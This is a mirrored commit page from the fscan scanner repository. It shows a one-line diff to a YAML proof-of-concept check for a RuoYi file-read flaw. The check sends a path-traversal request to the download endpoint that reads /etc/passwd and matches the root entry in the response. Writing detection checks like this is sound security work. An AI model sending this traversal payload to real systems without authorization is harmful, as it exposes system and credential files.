mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-13 21:02:44 +08:00
Update ruoyi-management-fileread.yml
This commit is contained in:
parent
97b205f4a7
commit
ce211fef78
@ -2,7 +2,7 @@ name: poc-yaml-ruoyi-management-fileread
|
||||
groups:
|
||||
linux:
|
||||
- method: GET
|
||||
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
|
||||
path: /common/download/resource?resource=/profile/../../../../etc/passwd
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
windows:
|
||||
|
Loading…
Reference in New Issue
Block a user